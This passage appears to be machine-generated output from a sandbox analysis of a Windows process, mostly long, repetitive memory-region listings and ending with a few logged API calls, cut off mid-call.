"" Region: id = 8875 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8876 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8877 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8878 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8879 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8880 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8881 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8882 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8883 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8884 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8885 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8886 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8887 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8888 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8889 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8890 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8891 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8892 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8893 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8894 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8895 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8896 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8897 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8898 start_va = 0x15e0000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8899 start_va = 0x1900000 end_va = 0x1c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 8900 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8901 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8902 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8903 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8904 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8905 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8906 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8907 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8908 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8909 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8910 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8911 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8912 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 8913 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8914 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8915 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8916 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8917 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8918 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8919 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8920 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8921 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8922 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8923 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8924 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8925 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8926 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8927 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8928 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8929 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8930 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8937 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8938 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8939 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8940 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8941 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8942 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8943 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8944 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8945 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8946 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8947 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8948 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8949 start_va = 0x15e0000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8950 start_va = 0x1900000 end_va = 0x1c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 8951 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8952 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8953 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8954 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8955 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8956 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8957 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8958 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8959 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8960 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8961 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8962 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8963 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 8964 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8965 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8966 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8967 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8968 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8969 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8970 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8971 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8972 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8973 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8974 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8975 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8976 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8977 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8978 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8979 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8980 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8981 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8982 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8983 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8984 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8985 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8986 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8987 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8988 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8989 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8990 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8991 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8992 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8993 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8994 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9003 start_va = 0x15e0000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 9004 start_va = 0x1900000 end_va = 0x1c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 9005 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 9006 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 9007 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 9008 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 9009 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 9010 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 9011 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 9012 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 9013 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 9014 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 9015 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 9016 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 9017 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 9018 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9019 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9020 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9021 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9022 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9023 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9024 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9025 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9026 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9027 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9028 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9029 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9030 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9031 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9032 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9033 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9034 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9035 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9036 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9037 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9038 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9039 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9040 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9041 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9042 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9044 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9045 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9046 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9047 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9048 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9049 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9050 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9051 start_va = 0x15e0000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 9052 start_va = 0x1900000 end_va = 0x1c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 9053 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 9054 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 9055 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 9056 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 9057 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 9058 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 9059 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 9060 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 9061 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 9062 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 9063 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 9064 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 9065 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 9066 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9067 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9068 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9069 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9070 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9071 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9072 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 9073 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Thread: id = 473 os_tid = 0xd44 [0284.960] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0284.962] SetThreadLocale (Locale=0x400) returned 1 [0285.541] GetVersion () returned 0x1db10106 [0285.541] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x769b0000 [0285.541] GetProcAddress (hModule=0x769b0000, 